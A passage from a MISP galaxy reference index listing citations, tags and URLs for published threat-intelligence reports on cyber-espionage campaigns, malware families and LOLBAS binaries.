The tag is: misp-galaxy:references="Microsoft VBA"

Table 14779. Table References

Links

https://docs.microsoft.com/office/vba/api/overview/

OfflineScannerShell.exe - LOLBAS Project

LOLBAS. (2021, August 16). OfflineScannerShell.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="OfflineScannerShell.exe - LOLBAS Project"

Table 14780. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/

Bitdefender Agent Tesla April 2020

Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020.

The tag is: misp-galaxy:references="Bitdefender Agent Tesla April 2020"

Table 14781. Table References

Links

https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/

Palo Alto OilRig April 2017

Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.

The tag is: misp-galaxy:references="Palo Alto OilRig April 2017"

Table 14782. Table References

Links

http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/

OilRig New Delivery Oct 2017

Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018.

The tag is: misp-galaxy:references="OilRig New Delivery Oct 2017"

Table 14783. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/

Palo Alto OilRig Oct 2016

Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.

The tag is: misp-galaxy:references="Palo Alto OilRig Oct 2016"

Table 14784. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/

Unit 42 OilRig Sept 2018

Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.

The tag is: misp-galaxy:references="Unit 42 OilRig Sept 2018"

Table 14785. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/

Unit42 RDAT July 2020

Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.

The tag is: misp-galaxy:references="Unit42 RDAT July 2020"

Table 14786. Table References

Links

https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/

Unit 42 QUADAGENT July 2018

Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.

The tag is: misp-galaxy:references="Unit 42 QUADAGENT July 2018"

Table 14787. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/

OilRig ISMAgent July 2017

Falcone, R. and Lee, B. (2017, July 27). OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group. Retrieved January 8, 2018.

The tag is: misp-galaxy:references="OilRig ISMAgent July 2017"

Table 14788. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/

Unit 42 RGDoor Jan 2018

Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.

The tag is: misp-galaxy:references="Unit 42 RGDoor Jan 2018"

Table 14789. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/

Palo Alto OilRig Sep 2018

Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="Palo Alto OilRig Sep 2018"

Table 14790. Table References

Links

https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/

ESET Okrum July 2019

Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.

The tag is: misp-galaxy:references="ESET Okrum July 2019"

Table 14791. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf

Talos Agent Tesla Oct 2018

Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Talos Agent Tesla Oct 2018"

Table 14792. Table References

Links

https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html

Securelist Malware Tricks April 2017

Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.

The tag is: misp-galaxy:references="Securelist Malware Tricks April 2017"

Table 14793. Table References

Links

https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/

Red Canary Verclsid.exe

Haag, M., Levan, K. (2017, April 6). Old Phishing Attacks Deploy a New Methodology: Verclsid.exe. Retrieved August 10, 2020.

The tag is: misp-galaxy:references="Red Canary Verclsid.exe"

Table 14794. Table References

Links

https://redcanary.com/blog/verclsid-exe-threat-detection/

Talos Olympic Destroyer 2018

Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.

The tag is: misp-galaxy:references="Talos Olympic Destroyer 2018"

Table 14795. Table References

Links

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

Crowdstrike Pirate Panda April 2020

Busselen, M. (2020, April 7). On-demand Webcast: CrowdStrike Experts on COVID-19 Cybersecurity Challenges and Recommendations. Retrieved May 20, 2020.

The tag is: misp-galaxy:references="Crowdstrike Pirate Panda April 2020"

Table 14796. Table References

Links

https://www.crowdstrike.com/blog/on-demand-webcast-crowdstrike-experts-on-covid-19-cybersecurity-challenges-and-recommendations/

OneDriveStandaloneUpdater.exe - LOLBAS Project

LOLBAS. (2021, August 22). OneDriveStandaloneUpdater.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="OneDriveStandaloneUpdater.exe - LOLBAS Project"

Table 14797. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/

chasing_avaddon_ransomware

Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022.

The tag is: misp-galaxy:references="chasing_avaddon_ransomware"

Table 14798. Table References

Links

https://www.mandiant.com/resources/chasing-avaddon-ransomware

Onion Routing

Wikipedia. (n.d.). Onion Routing. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Onion Routing"

Table 14799. Table References

Links

https://en.wikipedia.org/wiki/Onion_routing

FireEye FIN7 Aug 2018

Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.

The tag is: misp-galaxy:references="FireEye FIN7 Aug 2018"

Table 14800. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

OSX.FairyTale

Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="OSX.FairyTale"

Table 14801. Table References

Links

https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/

Unit 42 OopsIE! Feb 2018

Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.

The tag is: misp-galaxy:references="Unit 42 OopsIE! Feb 2018"

Table 14802. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/

Proofpoint ZeroT Feb 2017

Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018.

The tag is: misp-galaxy:references="Proofpoint ZeroT Feb 2017"

Table 14803. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx

OpenConsole.exe - LOLBAS Project

LOLBAS. (2022, June 17). OpenConsole.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="OpenConsole.exe - LOLBAS Project"

Table 14804. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/OpenConsole/

Open Login Items Apple

Apple. (n.d.). Open items automatically when you log in on Mac. Retrieved October 1, 2021.

The tag is: misp-galaxy:references="Open Login Items Apple"

Table 14805. Table References

Links

https://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac

Operating with EmPyre

rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July 12, 2017.

The tag is: misp-galaxy:references="Operating with EmPyre"

Table 14806. Table References

Links

https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363

Windows AppleJeus GReAT

Global Research & Analysis Team, Kaspersky Lab (GReAT). (2018, August 23). Operation AppleJeus: Lazarus hits cryptocurrency exchange with fake installer and macOS malware. Retrieved September 27, 2022.

The tag is: misp-galaxy:references="Windows AppleJeus GReAT"

Table 14807. Table References

Links

https://securelist.com/operation-applejeus/87553/

Novetta Blockbuster Destructive Malware

Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.

The tag is: misp-galaxy:references="Novetta Blockbuster Destructive Malware"

Table 14808. Table References

Links

https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

Novetta Blockbuster Loaders

Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Loaders, Installers and Uninstallers Report. Retrieved March 2, 2016.

The tag is: misp-galaxy:references="Novetta Blockbuster Loaders"

Table 14809. Table References

Links

https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf

Novetta Blockbuster RATs

Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Remote Administration Tools & Content Staging Malware Report. Retrieved March 16, 2016.

The tag is: misp-galaxy:references="Novetta Blockbuster RATs"

Table 14810. Table References

Links

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf

Novetta Blockbuster Tools

Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Tools Report. Retrieved March 10, 2016.

The tag is: misp-galaxy:references="Novetta Blockbuster Tools"

Table 14811. Table References

Links

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf

Novetta Blockbuster

Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.

The tag is: misp-galaxy:references="Novetta Blockbuster"

Table 14812. Table References

Links

https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

FireEye Clandestine Wolf

Eng, E., Caselden, D.. (2015, June 23). Operation Clandestine Wolf – Adobe Flash Zero-Day in APT3 Phishing Campaign. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="FireEye Clandestine Wolf"

Table 14813. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html

Cylance Cleaver

Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.

The tag is: misp-galaxy:references="Cylance Cleaver"

Table 14814. Table References

Links

https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

PWC Cloud Hopper April 2017

PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.

The tag is: misp-galaxy:references="PWC Cloud Hopper April 2017"

Table 14815. Table References

Links

https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf

PWC Cloud Hopper Technical Annex April 2017

PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.

The tag is: misp-galaxy:references="PWC Cloud Hopper Technical Annex April 2017"

Table 14816. Table References

Links

https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf

Cybereason Cobalt Kitty 2017

Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.

The tag is: misp-galaxy:references="Cybereason Cobalt Kitty 2017"

Table 14817. Table References

Links

https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf

Cybereason Oceanlotus May 2017

Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Cybereason Oceanlotus May 2017"

Table 14818. Table References

Links

https://www.cybereason.com/blog/operation-cobalt-kitty-apt

Cybereason OperationCuckooBees May 2022

Cybereason Nocturnus. (2022, May 4). Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques. Retrieved September 22, 2022.

The tag is: misp-galaxy:references="Cybereason OperationCuckooBees May 2022"

Table 14819. Table References

Links

https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques

Securelist ScarCruft Jun 2016

Raiu, C., and Ivanov, A. (2016, June 17). Operation Daybreak. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Securelist ScarCruft Jun 2016"

Table 14820. Table References

Links

https://securelist.com/operation-daybreak/75100/

FireEye Operation Double Tap

Moran, N., et al. (2014, November 21). Operation Double Tap. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="FireEye Operation Double Tap"

Table 14821. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html

ClearSky Lazarus Aug 2020

ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.

The tag is: misp-galaxy:references="ClearSky Lazarus Aug 2020"

Table 14822. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf

Cylance Dust Storm

Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.

The tag is: misp-galaxy:references="Cylance Dust Storm"

Table 14823. Table References

Links

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

DustySky

ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.

The tag is: misp-galaxy:references="DustySky"

Table 14824. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf

DustySky2

ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="DustySky2"

Table 14825. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf

Trend Micro Tick November 2019

Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.

The tag is: misp-galaxy:references="Trend Micro Tick November 2019"

Table 14826. Table References

Links

https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

FireEye DeputyDog 9002 November 2013

Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="FireEye DeputyDog 9002 November 2013"

Table 14827. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html

Volexity Exchange Marauder March 2021

Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.

The tag is: misp-galaxy:references="Volexity Exchange Marauder March 2021"

Table 14828. Table References

Links

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

ESET Dukes October 2019

Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.

The tag is: misp-galaxy:references="ESET Dukes October 2019"

Table 14829. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

IssueMakersLab Andariel GoldenAxe May 2017

IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="IssueMakersLab Andariel GoldenAxe May 2017"

Table 14830. Table References

Links

http://www.issuemakerslab.com/research3/

ESET Operation Groundbait

Cherepanov, A.. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016.

The tag is: misp-galaxy:references="ESET Operation Groundbait"

Table 14831. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf

Operation Hangover May 2013

Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016.

The tag is: misp-galaxy:references="Operation Hangover May 2013"

Table 14832. Table References

Links

http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf

ESET Lazarus Jun 2020

Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.

The tag is: misp-galaxy:references="ESET Lazarus Jun 2020"

Table 14833. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf

AhnLab Kimsuky Kabar Cobra Feb 2019

AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="AhnLab Kimsuky Kabar Cobra Feb 2019"

Table 14834. Table References

Links

https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf

Villeneuve et al 2014

Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Villeneuve et al 2014"

Table 14835. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf

Mandiant Operation Ke3chang November 2014

Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Mandiant Operation Ke3chang November 2014"

Table 14836. Table References

Links

https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs

Cisco Operation Layover September 2021

Ventura, V. (2021, September 16). Operation Layover: How we tracked an attack on the aviation industry to five years of compromise. Retrieved September 15, 2023.

The tag is: misp-galaxy:references="Cisco Operation Layover September 2021"

Table 14837. Table References

Links

https://blog.talosintelligence.com/operation-layover-how-we-tracked-attack/

Lotus Blossom Jun 2015

Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.

The tag is: misp-galaxy:references="Lotus Blossom Jun 2015"

Table 14838. Table References

Links

https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html

FireEye Operation Molerats

Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016.

The tag is: misp-galaxy:references="FireEye Operation Molerats"

Table 14839. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html

McAfee Lazarus Nov 2020

Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.

The tag is: misp-galaxy:references="McAfee Lazarus Nov 2020"

Table 14840. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/

McAfee Lazarus Jul 2020

Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.

The tag is: misp-galaxy:references="McAfee Lazarus Jul 2020"

Table 14841. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/?hilite=%27Operation%27%2C%27North%27%2C%27Star%27

McAfee Oceansalt Oct 2018

Sherstobitoff, R., Malhotra, A. (2018, October 18). ‘Operation Oceansalt’ Attacks South Korea, U.S., and Canada With Source Code From Chinese Hacker Group. Retrieved November 30, 2018.

The tag is: misp-galaxy:references="McAfee Oceansalt Oct 2018"

Table 14842. Table References

Links

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

FireEye OpPoisonedHandover February 2016

Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.

The tag is: misp-galaxy:references="FireEye OpPoisonedHandover February 2016"

Table 14843. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html

Operation Quantum Entanglement

Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 4, 2015.

The tag is: misp-galaxy:references="Operation Quantum Entanglement"

Table 14844. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf

ProofPoint GoT 9002 Aug 2017

Huss, D. & Mesa, M. (2017, August 25). Operation RAT Cook: Chinese APT actors use fake Game of Thrones leaks as lures. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="ProofPoint GoT 9002 Aug 2017"

Table 14845. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures

FireEye Op RussianDoll

FireEye Labs. (2015, April 18). Operation RussianDoll: Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia’s APT28 in Highly-Targeted Attack. Retrieved April 24, 2017.

The tag is: misp-galaxy:references="FireEye Op RussianDoll"

Table 14846. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html

FireEye Operation Saffron Rose 2013

Villeneuve, N. et al.. (2013). OPERATION SAFFRON ROSE . Retrieved May 28, 2020.

The tag is: misp-galaxy:references="FireEye Operation Saffron Rose 2013"

Table 14847. Table References

Links

https://www.mandiant.com/sites/default/files/2021-09/rpt-operation-saffron-rose.pdf

Cylance Shaheen Nov 2018

Livelli, K, et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019.

The tag is: misp-galaxy:references="Cylance Shaheen Nov 2018"

Table 14848. Table References

Links

https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517

McAfee Sharpshooter December 2018

Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.

The tag is: misp-galaxy:references="McAfee Sharpshooter December 2018"

Table 14849. Table References

Links

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf

Novetta-Axiom

Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Novetta-Axiom"

Table 14850. Table References

Links

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

Cybereason Soft Cell June 2019

Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019.

The tag is: misp-galaxy:references="Cybereason Soft Cell June 2019"

Table 14851. Table References

Links

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

Azure AD Graph API

Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020.

The tag is: misp-galaxy:references="Azure AD Graph API"

Table 14852. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview

ESET Operation Spalax Jan 2021

  1. Porolli. (2021, January 21). Operation Spalax: Targeted malware attacks in Colombia. Retrieved September 16, 2022.

The tag is: misp-galaxy:references="ESET Operation Spalax Jan 2021"

Table 14853. Table References

Links

https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/

Proofpoint TA453 July2021

Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021.

The tag is: misp-galaxy:references="Proofpoint TA453 July2021"

Table 14854. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453

Proofpoint Operation Transparent Tribe March 2016

Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.

The tag is: misp-galaxy:references="Proofpoint Operation Transparent Tribe March 2016"

Table 14855. Table References

Links

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

TrendMicro TropicTrooper 2015

Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.

The tag is: misp-galaxy:references="TrendMicro TropicTrooper 2015"

Table 14856. Table References

Links

https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf

ClearSky and Trend Micro Operation Wilted Tulip July 2017

ClearSky and Trend Micro. (2017, July). Operation Wilted Tulip - Exposing a cyber espionage apparatus. Retrieved May 17, 2021.

The tag is: misp-galaxy:references="ClearSky and Trend Micro Operation Wilted Tulip July 2017"

Table 14857. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf

ClearSky Wilted Tulip July 2017

ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.

The tag is: misp-galaxy:references="ClearSky Wilted Tulip July 2017"

Table 14858. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf

ESET Windigo Mar 2014

Bilodeau, O., Bureau, M., Calvet, J., Dorais-Joncas, A., Léveillé, M., Vanheuverzwijn, B. (2014, March 18). Operation Windigo – the vivisection of a large Linux server‑side credential‑stealing malware campaign. Retrieved February 10, 2021.

The tag is: misp-galaxy:references="ESET Windigo Mar 2014"

Table 14859. Table References

Links

https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/

FoxIT Wocao December 2019

Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.

The tag is: misp-galaxy:references="FoxIT Wocao December 2019"

Table 14860. Table References

Links

https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf

TrendMicro Operation Woolen Goldfish March 2015

Cedric Pernet, Kenney Lu. (2015, March 19). Operation Woolen-Goldfish - When Kittens Go phishing. Retrieved April 21, 2021.

The tag is: misp-galaxy:references="TrendMicro Operation Woolen Goldfish March 2015"

Table 14861. Table References

Links

https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf

Bleeping Computer Op Sharpshooter March 2019

  1. Ilascu. (2019, March 3). Op 'Sharpshooter' Connected to North Korea’s Lazarus Group. Retrieved September 26, 2022.

The tag is: misp-galaxy:references="Bleeping Computer Op Sharpshooter March 2019"

Table 14862. Table References

Links

https://www.bleepingcomputer.com/news/security/op-sharpshooter-connected-to-north-koreas-lazarus-group/

Symantec Orangeworm IOCs April 2018

Symantec Security Response Attack Investigation Team. (2018, April 23). Orangeworm: Indicators of Compromise. Retrieved July 8, 2018.

The tag is: misp-galaxy:references="Symantec Orangeworm IOCs April 2018"

Table 14863. Table References

Links

https://symantec-enterprise-blogs.security.com/sites/default/files/2018-04/Orangeworm%20IOCs.pdf

Symantec WastedLocker June 2020

Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021.

The tag is: misp-galaxy:references="Symantec WastedLocker June 2020"

Table 14864. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us

Symantec Calisto July 2018

Pantig, J. (2018, July 30). OSX.Calisto. Retrieved September 7, 2018.

The tag is: misp-galaxy:references="Symantec Calisto July 2018"

Table 14865. Table References

Links

https://web.archive.org/web/20190111082249/https://www.symantec.com/security-center/writeup/2018-073014-2512-99?om_rssid=sr-latestthreats30days

Objective-See MacMa Nov 2021

Wardle, P. (2021, November 11). OSX.CDDS (OSX.MacMa). Retrieved June 30, 2022.

The tag is: misp-galaxy:references="Objective-See MacMa Nov 2021"

Table 14866. Table References

Links

https://objective-see.org/blog/blog_0x69.html

hexed osx.dok analysis 2019

